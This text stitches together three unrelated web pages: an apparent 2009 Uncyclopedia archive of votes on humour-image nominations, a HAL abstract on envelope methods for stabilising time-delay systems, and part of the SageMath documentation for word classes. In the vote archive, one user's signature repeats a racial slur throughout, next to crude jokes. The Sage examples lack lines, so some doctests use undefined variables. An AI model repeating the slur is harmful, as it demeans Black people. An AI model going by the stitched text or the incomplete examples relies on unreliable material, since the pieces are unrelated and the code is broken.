BFF 13:58, 11 May 2009 (UTC) To be clear, this has nothing to do with the Whore Dramathon, completely unrelated. This was all in good fun.-- 19:19,11May,2009 -5, fail'd. 20:19, 11 May 2009 (UTC) Grand "Theft" Mario (history, logs) Featured picture candidate When Mario was investigated by the DEA for dealing mushrooms, the PR geniuses at Nintendo used the hype to make a spin-off video game. Image credit: Tunel Archive - Discuss this image Vote Score: -3 people who want to corrupt our youth Nomination: For Votes: 3 Nom and whatever It's okay. I mean, I kind of like it, I guess. -- 00:51, 12 May 2009 (UTC) For per above. --Mnb'z 05:49, 12 May 2009 (UTC) I know The GTA thing has been done, but I think this one is done better than most. Just because there is a few somewhat like it, doesn't mean NONE can be featured. If I guy writes an article, then another writes a new one using the same style, does that mean BOTH lose? 18:38,12May,2009 Against Votes: 6 Against. It's not at all badly done, what with the images that have been turned into the recognisable panels of a GTA cover, but this kind of image has been done multiple times before and I fail to see why Mario makes it any funnier. ---kun "whisper sweet nothings into thine ear..." 10:24, 12 May 2009 (UTC) Against as per Nachlader. • • • 15:03, May 12 Against. Oh boy, another GTA cover with a different character used. I think it's the originality I love about this the most. --UU - natter 15:08, May 12 Yeah, boring, whatever. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:06, 12 May 2009 (UTC) Against Nothing to see here. Nicely done, but the joke is tired. --Asahatter (annoy) 22:01, 12 May 2009 (UTC) Abstain needs more weaponry, cars, and semi-nude women (Peach, Daisy etc), only then will the incongruity of the two worlds be fully realised, by my reckoning --CrabPope 21:14, 12 May 2009 (UTC) Comments -3, fail'd. 01:55, 13 May 2009 (UTC) "SoIwastolazytolearnGermanic (history, logs) Featured picture candidate Archive - Discuss this image Vote Score: -3 cute Nachlader sigs Nomination: 09:49, 13 May 2009 (UTC) For Votes: 1 Nachlader. Certainly a piece of magnificent art, wonderfully crafted. 09:49, 13 May 2009 (UTC) Against Votes: 4 No, seriously. ~ 09:54, 13 May 2009 (UTC) Against.. Featured pictures Zheliel not featured sigs. -- 09:59, 13 May 2009 (UTC) Too much gray in the background. 10:04, 13 May 2009 (UTC) Fuckino -- 12:38, 13 May 2009 (UTC) Comments -3, vanity...I mean, fail'd. 13:21, 13 May 2009 (UTC) Uncyclopedia Bomb (history, logs) Featured picture candidate An Uncyclo-Bomb. Unfortunately, the maker forgot to cap the potato, so this will go to waste. Image credit: Sliferjam Archive - Discuss this image Vote Score: -3 *boom!* Nomination: 11:30, 13 May 2009 (UTC) For Votes: 2 Nom+4. Artistic :D 11:30, 13 May 2009 (UTC) Penis That's Why. 16:41,13May,2009 Against Votes: 5 Dude! Where do you find this stuff? -- 13:19, 13 May 2009 (UTC) Against. Insert desperate jacket potato related pun here. ---kun "whisper sweet nothings into thine ear..." 13:30, 13 May 2009 (UTC) KABOOM! 16:41, 13 May 2009 (UTC) Against ms painty. --Mnb'z 18:23, 13 May 2009 (UTC) Artistic. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:31, 13 May 2009 (UTC) Comments -3, fail'd. 01:18, 14 May 2009 (UTC) "zombiebaron (history, logs) Featured picture candidate You can all thank Nachlader for this. Image credit: mtallmen_184 Archive - Discuss this image Vote Score: -4 zombiebarons Nomination: Mtallmen 184 20:58, 14 May 2009 (UTC) For Votes: 5 Nom+For--Mtallmen 184 20:58, 14 May 2009 (UTC) Fuck yes. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 21:27, 14 May 2009 (UTC) For I dont know what to criticize...the font?--Fuentfue 22:10, 14 May 2009 (UTC) For --Docile hippopotamus 22:16, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) Invalid zombiebaron, double zombiebaron'ing. 00:25, 15 May 2009 (UTC) For could be a bit more text based though. --Mnb'z 05:14, 15 May 2009 (UTC) Against Votes: 9 Zombiebaron. 20:59, 14 May 2009 (UTC) Text base. ~ 22:13, 14 May 2009 (UTC) Against. I mean, zombiebaron. 23:46, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) Invalid zombiebaron, double zombiebaron'ing. 00:25, 15 May 2009 (UTC) Zombiebaron zombiebaron zombiebaron? Zombiebaron zombiebaron. ZOMBIEBARON! ZOOOOMBIIIEEEEBAROOOON!!!....zombiebaron. - 00:32, 15 May 2009 (UTC) Exactly. 03:17, 15 May 2009 (UTC) Yeah. Text-based in-joke. No. • Spang • • 06:48, 15 May 2009 Against Not enough text, I think, could be wrong though. (talk) 06:54, 15 May 2009 (UTC) Hnnng. --UU - natter 08:27, May 15 Respect the undead -- 15:14, 15 May 2009 (UTC) AHAHAHAHA!!! • • • 15:48, May 15 I am voting to show that I am aware of the joke here and am therefore part of the "cool" crowd. I don't get it. -OptyC Sucks! CUN15:52, 15 May Comments Swine flu and now this. I give people the wrong ideas these days. ---kun "whisper sweet nothings into thine ear..." 22:34, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) -4, fail'd. 20:55, 15 May 2009 (UTC) "Dog (history, logs) Featured picture candidate i" like this Image credit: TicklerLeon11 Archive - Discuss this image Vote Score: -0.5 Nomination: TicklerLeon11 17:55, 29 April 2009 (UTC)~ For Votes: 12.5 sn+f TicklerLeon11 17:55, 29 April 2009 (UTC)~ This is better than anything Da Vinci ever made. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:54, 29 April 2009 (UTC) Don't you mean Picasso? —Socky (stalk) 21:30, 29 April 2009 (UTC) Him too (and I see what you mean). -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 21:31, 29 April 2009 (UTC) For. I think it's rather risqué for a pre-Raphaelite period painting, but the romantic yet gothic themes are evident in how well the brush has been carefully defted in the facial features. T'were it a novel, it would've been written by Mary Shelley. I can imagine myself with some cheese, some 47' Pinot Noir and an evening of Dvorak whilst admiring this painting. ---kun "whisper sweet nothings into thine ear..." 21:32, 29 April 2009 (UTC) You convinced me. —Socky (stalk) 21:34, 29 April 2009 (UTC) Terrible. -OptyC Sucks! CUN21:37, 29 Apr For. Surprised people are voting for it. --Docile hippopotamus 22:06, 29 April 2009 (UTC) For. Nice change. Love this pic as well. 16:10, 30 April 2009 (UTC) For Made me laugh a little. Well, at least chuckle. Plus, it's definitely an original. --MegaPleb • Dexter111344 • Complain here 20:51, 30 April 2009 (UTC) This is better than Modern Art --Mtallmen 184 21:43, 1 May 2009 (UTC) For. It's artistic and humorous. --Codell 21:05, 6 May 2009 (UTC) Post-Mortemestic masterpiece. Go eat shit, picasso. Colour Sig For Make Mahm00shA Look Cool 23:57, 9 May '09 can i be serious? this is the only picture, scrolling through VFP, that has ever made me laugh. therefore, it gets a for vote. it's really such a strange brand of humour that doesn't actually make sense at all but it's funny. —The preceding unsigned comment was added by Djdorama (talk • contribs) diff GREAT This magnificent painting is far ahead of it's time!--168.8.212.135 14:52, 13 May 2009 (UTC) Against Votes: 13 Against. That dog ate my red baseball cap. Jerk. 00:42, 30 April 2009 (UTC) Buzzkill It has to be done. Voting for something like this is fine until the possibility of it's success becomes plausible. --Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 01:35, 30 April 2009 (UTC) Like when you were on American Idol? 05:03, 30 April 2009 (UTC) Per Chedder so very per -- 10:34, 30 April 2009 (UTC) Too much quality. • • • 15:13, Apr 30 strong zombiebaron. SirGerrycheeversGunTalk 15:23, 30 April 2009 (UTC) Against. MSPaint.--123 •T•C•E 20:34, 30 April 2009 (UTC) Y'what? ---kun "whisper sweet nothings into thine ear..." 23:16, 30 April 2009 (UTC) NOOOOOOOOO! - I was once bitten by a dog. :-( OK, not really. Rbpolsen♦☺ 00:36, 1 May 2009 (UTC) Against CGMWTP reborn. --Mnb'z 03:35, 2 May 2009 (UTC) Against As per Cheddar & DJ. Also very very per. -- 12:44, 4 May 2009 (UTC) Down boy. --UU - natter 11:05, May 5 Obliterate. er...I mean Against. (talk) 22:52, 10 May 2009 (UTC) Against. Is the joke the fact that someone should think this worthy of feature? Some sanity called for - this isn't Fisher Price --Asahatter (annoy) 22:11, 12 May 2009 (UTC) O LOL. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:24, May 17 Comments We should at the very least give some kind of award to the creator of this magnificent image. —Socky (stalk) 20:54, 30 April 2009 (UTC) A public hanging? This kind of painting is so 1848. We're in the POST-IMPRESSIONIST age now! Think of it - Henri Rousseau-powered vacuum cleaners, Paul Cézanne-inspired rockets to space, flying cars fueled by Émile Bernard! EVEN TRAINS GUIDED BY PAUL SIGNAC! Post-Impressionism is FUTURISM! ---kun "whisper sweet nothings into thine ear..." 23:21, 30 April 2009 (UTC) OI! LOOK OVER HERE YA'LL! We got a regular Art Major over 'ere. WE DON'T LIKE YER KIND, PAINTER BOY! Woody On Fire! Talking Woody Stalking Woody 23:38, 30 April 2009 (UTC) Yeah! We likes them classy paintins on the velvet. 02:54, 1 May 2009 (UTC) He looks just like my first dog Sam. I can't believe this is getting so many against votes. You jerks just hate dogs don't you? -OptyC Sucks! CUN22:37, 8 May 2 weeks, -0.5, fail'd. 19:19, 17 May 2009 (UTC) Pedobear 1 (history, logs) Featured picture candidate Pedobear likes what he sees. Image credit: mtallmen_184 Archive - Discuss this image Vote Score: -3 Pedobear seals of approval Nomination: Mtallmen 184 18:18, 17 May 2009 (UTC) For Votes: 1 nom and for--Mtallmen 184 18:18, 17 May 2009 (UTC) Against Votes: 4 Been there, done that. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 18:24, 17 May 2009 (UTC) Against. Old joke. Sloppy execution. -- User:KneeChee27/sig 18:35, 17 May 2009 (UTC) MObear says "No". 19:16, 17 May 2009 (UTC) Pass. Quickly please. --T. (talk) 23:03, 17 May 2009 (UTC) Comments -3, fail'd. 02:48, 18 May 2009 (UTC) A text based Image (history, logs) Featured picture candidate There is no such thing as a good text based image, as too much text ruins all images. Image credit: Fuentfue Archive - Discuss this image Vote Score: -3 Text based Images Nomination: Fuentfue 06:19, 13 May 2009 (UTC)fuentfue For Votes: 5 SN&F-fuent Bless.. Holy indeed. 09:39, 13 May 2009 (UTC) I like it. 10:03, 13 May 2009 (UTC) For Italian Art. 21:08,13May,2009 For. --Docile hippopotamus 03:27, 14 May 2009 (UTC) Against Votes: 8 Next, we're going to have an image that simply reads "zombiebaron". ---kun "whisper sweet nothings into thine ear..." 09:23, 13 May 2009 (UTC) Against. -- 10:01, 13 May 2009 (UTC) Against. concept is funny, but execution could use some work. --Mnb'z 18:25, 13 May 2009 (UTC) Against. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:38, 13 May 2009 (UTC) 'Gainst as per Nach. • • • 02:56, May 14 Against We have the much better printer-based Mona Lisa, and this really didn't take much to create I'm sure. Also, not very funny. - 23:55, 14 May 2009 (UTC) Against. Made to make a point. But it's not funny, even as an illustration of said point. --UU - natter 08:26, May 15 per UU. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:25, May 17 Comments -3, fail'd. 03:07, 19 May 2009 (UTC) "WWF" Press Conference (history, logs) Featured picture candidate The lion mouths off to the bear in front of the press. The gorilla imagines what they had for lunch. Image credit: Sonje Archive - Discuss this image Vote Score: 7 Wrestlers that are NOT on steroids. Nomination: Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 19:47, 16 March 2009 (UTC) For Votes: 13 Nom + For I just think it's a funny picture, seeing as wrestlers could be compared to wild animals, so it's also kinda deep.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 19:47, 16 March 2009 (UTC) I'm not voting, but WWF used to be Worldwide Wrestling Federation until the World Wildlife Foundation claimed rights to the acronym. So my point is that the picture is kinda a cross between the two things using the acronym.Or mabye I'm entirely wrong...Sonje how did you think of this???-- - StonedJeff  TALK talk to me 04:05, 22 March 2009 (UTC) Ahhahahhahaha (I fuckin' hate that commercial where they show that polar bear cub trying to follow it's mother, but it's pretty much made clear that it drowns, thanks assholes, as if I wasn't already depressed). -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 19:50, 16 March 2009 (UTC) So true, despite the fact that it has nothing to do with this pic.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods Very For. —Socky (stalk) 19:51, 16 March 2009 (UTC) For! I understand Sonje still wants to finish some parts of this image, but she isn't gettng away with that one. Awesome image. ---kun "whisper sweet nothings into thine ear..." 20:41, 16 March 2009 (UTC) Sonje is a she??? I didn't know that.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods God, I know! And on the internet! Date her! ---kun "whisper sweet nothings into thine ear..." 22:13, 16 March 2009 (UTC) Lol. I didn't know Sonje is a she. VERY FOR!!! Sonje is great at this. 11:04, 17 March 2009 (UTC) For. --Mnb'z 14:46, 17 March 2009 (UTC) FOR --CrabPope 10:31, 18 March 2009 (UTC) For I don't know about deep...but funny non the less ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 15:24, 18 March 2009 (UTC) Likey -- T​K​F​​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​CK 17:54, 22 March 2009 (UTC) Just For—Flutter (Talk•Games•Fun Pages•Awards•Help) 21:59, 22 March 2009 (UTC) For I get it. -- 19:09, 17 April 2009 (UTC) For, but hmm, what would my environmentalist friends think of this?-- 00:26, 21 April 2009 (UTC) For. -- User:KneeChee27/sig 18:39, 17 May 2009 (UTC) Against Votes: 6 Against Nicely done image, but I don't get the joke. Sry. MrN  Fork you! 03:17, Mar 22 Against I've seen better chops, especially from Sonje. Woody On Fire! Talking Woody Stalking Woody 20:17, 29 March 2009 (UTC) #Against per MrN. -- 22:49, 30 March 2009 (UTC) Against - 08:59, 2 April 2009 (UTC) against Djdorama 16:09, 11 April 2009 (UTC) Weak against It is funny but the chopping isn't all that great. -- 09:03, 6 May 2009 (UTC) Against. I looked at this image and said "huh?" After reading comments I found out that the image was used in a wrestling article and understood, however the image does not stand on its own. Robertodole 09:42, 6 May 2009 (UTC) Comments Abstain. - Meh. • • • 15:39, Mar 18 Back in the very early days of pro wrestling it was a fairly common practice to book matches between a wrestler and a bear. This has almost nothing to do with the picture, I just thought it was quite interesting. -- 20:51, 20 March 2009 (UTC) Comment: the lighting on that bear's head looks off. Shouldn't it be more lit up from the flash? Other than that, I don't really get it... - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 03:11, Mar 22 Abstain. - On the one hand, there is little to no text and the hair was very artfully pasted. On the other hand, it isn't that funny. Rbpolsen♦☺ 02:19, 26 March 2009 (UTC) Comment:I don't think this one will work as a featured pic on its own. I made it for Nachlader's WWF article, it worked in the context of the article. -- 12:00, 10 April 2009 (UTC) I think it would work. If you've ever seen pro wrestlers, they don't look like normal human beings. They sometimes look like vicious animals that will bite you head off. Therefore, it's an incredibly accurate metaphor represented by an excellently 'shopped and humorous image. --Cheddar Over two months, +7, Fail'd. 20:52, 22 May 2009 (UTC) "Rick" Bird.png (history, logs) Featured picture candidate You know the rules and so do I Image credit: Iwillkillyou333 Archive - Discuss this image Vote Score: -3 Nomination: Iwillkillyou333 20:58, 22 May 2009 (UTC) For Votes: 2 Tis as if the gods themselves crafted this image --CrabPope 21:43, 22 May 2009 (UTC) Wonderfull... 03:45, 23 May 2009 (UTC) Against Votes: 5 No wonder we're in a bloody recession. ---kun "whisper sweet nothings into thine ear..." 21:05, 22 May 2009 (UTC) I don't know if the front page can even handle an image with so much quality. User:KneeChee27/sig2 21:29, 22 May 2009 (UTC) Against. His version of Particle Man kicked ass. This, not so much. 02:42, 23 May 2009 (UTC) Do the rules include inexplicable eraser marks and strange missing pieces of head? -- 03:15, 23 May 2009 (UTC) Rickroll'd. 09:07, 23 May 2009 (UTC) Comments Thanks for all the sarcasms, NOT!} --Iwillkillyou333 04:00, 23 May 2009 (UTC) -3, fail'd. 14:23, 23 May 2009 (UTC)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7628136277198792, "perplexity": 19381.02004643625}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-49/segments/1416931011032.12/warc/CC-MAIN-20141125155651-00229-ip-10-235-23-156.ec2.internal.warc.gz"}
https://hal.inria.fr/hal-01970655
# Stability and Robust Stabilisation Through Envelopes for Retarded Time-Delay Systems 1 DISCO - Dynamical Interconnected Systems in COmplex Environments L2S - Laboratoire des signaux et systèmes, Inria Saclay - Ile de France, SUPELEC, CNRS - Centre National de la Recherche Scientifique : UMR8506 2 Division Systèmes - L2S L2S - Laboratoire des signaux et systèmes : 1289 Abstract : This work deals with stability and robust stabilisation of retarded time-delay systems by applying a new method for obtaining an envelope that bounds all the system poles. Through LMIs we are able to determine envelopes that can be applied to verify the stability of the system and can also be utilised to design robust state-feedback controllers which cope with design requirements regarding $α$ − stability. Keywords : Document type : Conference papers https://hal.inria.fr/hal-01970655 Contributor : Catherine Bonnet <> Submitted on : Saturday, January 5, 2019 - 6:16:56 PM Last modification on : Tuesday, June 4, 2019 - 11:08:06 AM Long-term archiving on : Saturday, April 6, 2019 - 1:10:34 PM ### File envelope_Rocond_rev.pdf Files produced by the author(s) ### Identifiers • HAL Id : hal-01970655, version 1 ### Citation Caetano Cardeliquio, André Fioravanti, Catherine Bonnet, Silviu-Iulian Niculescu. Stability and Robust Stabilisation Through Envelopes for Retarded Time-Delay Systems. 9th IFAC Symposium on Robust Control Design, Sep 2018, Florianopolis, Brazil. ⟨hal-01970655⟩ Record views
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26240524649620056, "perplexity": 7812.327779161853}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627998708.41/warc/CC-MAIN-20190618083336-20190618105336-00222.warc.gz"}
http://www.sagemath.org/doc/reference/combinat/sage/combinat/words/word.html
Word classes¶ AUTHORS: • Arnaud Bergeron • Amy Glen • Sébastien Labbé • Franco Saliola class sage.combinat.words.word.FiniteWord_callable(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a callable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: f = lambda n : 3 if n > 8 else 6 sage: w = Word(f, length=30, caching=False) sage: w word: 666666666333333333333333333333 sage: w.is_symmetric() True TESTS: sage: w = Word(lambda n:n, length=10, caching=False) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_callable'> class sage.combinat.words.word.FiniteWord_callable_with_caching(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable_with_caching, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a callable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: f = lambda n : n % 3 sage: w = Word(f, length=32) sage: w word: 01201201201201201201201201201201 sage: w.border() word: 01201201201201201201201201201 TESTS: sage: w = Word(lambda n:n, length=10) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> Pickle also works for concatenation of words: sage: w = Word(range(10)) * Word('abcdef') sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> Pickle also works for power of words: sage: w = Word(range(10)) ^ 2 sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> class sage.combinat.words.word.FiniteWord_iter(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by an iterator. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word(iter(range(10)), caching=False) sage: w word: 0123456789 sage: w.finite_differences() word: 111111111 TESTS: sage: w = Word(iter(range(10)), caching=False) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_iter'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> class sage.combinat.words.word.FiniteWord_iter_with_caching(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by an iterator (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word(iter('abcdef')) sage: w.conjugate(2) word: cdefab TESTS: sage: w = Word(iter(range(10))) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_iter_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> class sage.combinat.words.word.FiniteWord_list Bases: sage.combinat.words.word_datatypes.WordDatatype_list, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a Python list. For any word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word(range(10)) sage: w.iterated_right_palindromic_closure() word: 0102010301020104010201030102010501020103... TESTS: sage: w = Word([0,1,1,0]) True class sage.combinat.words.word.FiniteWord_str Bases: sage.combinat.words.word_datatypes.WordDatatype_str, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a Python str. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word('abcdef') sage: w.is_square() False TESTS: sage: w = Word('abba') True class sage.combinat.words.word.FiniteWord_tuple Bases: sage.combinat.words.word_datatypes.WordDatatype_tuple, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a Python tuple. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word(()) sage: w.is_empty() True TESTS: sage: w = Word((0,1,1,0)) True class sage.combinat.words.word.InfiniteWord_callable(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable, sage.combinat.words.infinite_word.InfiniteWord_class Infinite word represented by a callable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: w = Word(lambda n:n, caching=False) sage: w word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,... sage: w.iterated_right_palindromic_closure() word: 0102010301020104010201030102010501020103... TESTS: sage: w = Word(lambda n:n, caching=False) sage: type(w) <class 'sage.combinat.words.word.InfiniteWord_callable'> sage: z word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,... sage: type(z) <class 'sage.combinat.words.word.InfiniteWord_callable'> class sage.combinat.words.word.InfiniteWord_callable_with_caching(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable_with_caching, sage.combinat.words.infinite_word.InfiniteWord_class Infinite word represented by a callable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: w = Word(lambda n:n) sage: factor = w[4:13] sage: factor word: 4,5,6,7,8,9,10,11,12 TESTS: sage: w = Word(lambda n:n) sage: type(w) <class 'sage.combinat.words.word.InfiniteWord_callable_with_caching'> sage: z word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,... sage: type(z) <class 'sage.combinat.words.word.InfiniteWord_callable_with_caching'> class sage.combinat.words.word.InfiniteWord_iter(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.infinite_word.InfiniteWord_class Infinite word represented by an iterable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: from itertools import chain, cycle sage: w = Word(chain('letsgo', cycle('forever')), caching=False) sage: w word: letsgoforeverforeverforeverforeverforeve... sage: prefix = w[:100] sage: prefix word: letsgoforeverforeverforeverforeverforeve... sage: prefix.is_lyndon() False TESTS: sage: from itertools import count sage: w = Word(count(), caching=False) sage: type(w) <class 'sage.combinat.words.word.InfiniteWord_iter'> Pickle is not supported for infinite word defined by an iterator: sage: dumps(w) Traceback (most recent call last): ... PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed class sage.combinat.words.word.InfiniteWord_iter_with_caching(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.infinite_word.InfiniteWord_class Infinite word represented by an iterable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list : they can be sliced using square braquets to define for example a prefix or a factor. EXAMPLES: sage: from itertools import cycle sage: w = Word(cycle([9,8,4])) sage: w word: 9849849849849849849849849849849849849849... sage: prefix = w[:23] sage: prefix word: 98498498498498498498498 sage: prefix.minimal_period() 3 TESTS: sage: from itertools import count sage: w = Word(count()) sage: type(w) <class 'sage.combinat.words.word.InfiniteWord_iter_with_caching'> Pickle is not supported for infinite word defined by an iterator: sage: dumps(w) Traceback (most recent call last): ... PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed sage.combinat.words.word.Word(data=None, alphabet=None, length=None, datatype=None, caching=True, RSK_data=None) Construct a word. INPUT: • data – (default: None) list, string, tuple, iterator, free monoid element, None (shorthand for []), or a callable defined on [0,1,...,length]. • alphabet – any argument accepted by Words • length – (default: None) This is dependent on the type of data. It is ignored for words defined by lists, strings, tuples, etc., because they have a naturally defined length. For callables, this defines the domain of definition, which is assumed to be [0, 1, 2, ..., length-1]. For iterators: Infinity if you know the iterator will not terminate (default); "unknown" if you do not know whether the iterator terminates; "finite" if you know that the iterator terminates, but do know know the length. • datatype – (default: None) None, "list", "str", "tuple", "iter", "callable". If None, then the function tries to guess this from the data. • caching – (default: True) True or False. Whether to keep a cache of the letters computed by an iterator or callable. • RSK_data – (Optional. Default: None) A semistandard and a standard Young tableau to run the inverse RSK bijection on. Note Be careful when defining words using callables and iterators. It appears that islice does not pickle correctly causing various errors when reloading. Also, most iterators do not support copying and should not support pickling by extension. EXAMPLES: Empty word: sage: Word() word: Word with string: sage: Word("abbabaab") word: abbabaab Word with string constructed from other types: sage: Word([0,1,1,0,1,0,0,1], datatype="str") word: 01101001 sage: Word((0,1,1,0,1,0,0,1), datatype="str") word: 01101001 Word with list: sage: Word([0,1,1,0,1,0,0,1]) word: 01101001 Word with list constructed from other types: sage: Word("01101001", datatype="list") word: 01101001 sage: Word((0,1,1,0,1,0,0,1), datatype="list") word: 01101001 Word with tuple: sage: Word((0,1,1,0,1,0,0,1)) word: 01101001 Word with tuple constructed from other types: sage: Word([0,1,1,0,1,0,0,1], datatype="tuple") word: 01101001 sage: Word("01101001", datatype="str") word: 01101001 Word with iterator: sage: from itertools import count sage: Word(count()) word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,... sage: Word(iter("abbabaab")) # iterators default to infinite words word: abbabaab sage: Word(iter("abbabaab"), length="unknown") word: abbabaab sage: Word(iter("abbabaab"), length="finite") word: abbabaab Word with function (a ‘callable’): sage: f = lambda n : add(Integer(n).digits(2)) % 2 sage: Word(f) word: 0110100110010110100101100110100110010110... sage: Word(f, length=8) word: 01101001 Word over a string with a parent: sage: w = Word("abbabaab", alphabet="abc"); w word: abbabaab sage: w.parent() Words over {'a', 'b', 'c'} Word from a free monoid element: sage: M.<x,y,z> = FreeMonoid(3) sage: Word(x^3*y*x*z^2*x) word: xxxyxzzx The default parent is the combinatorial class of all words: sage: w = Word("abbabaab"); w word: abbabaab sage: w.parent() Words We can also input a semistandard tableau and a standard tableau to obtain a word from the inverse RSK 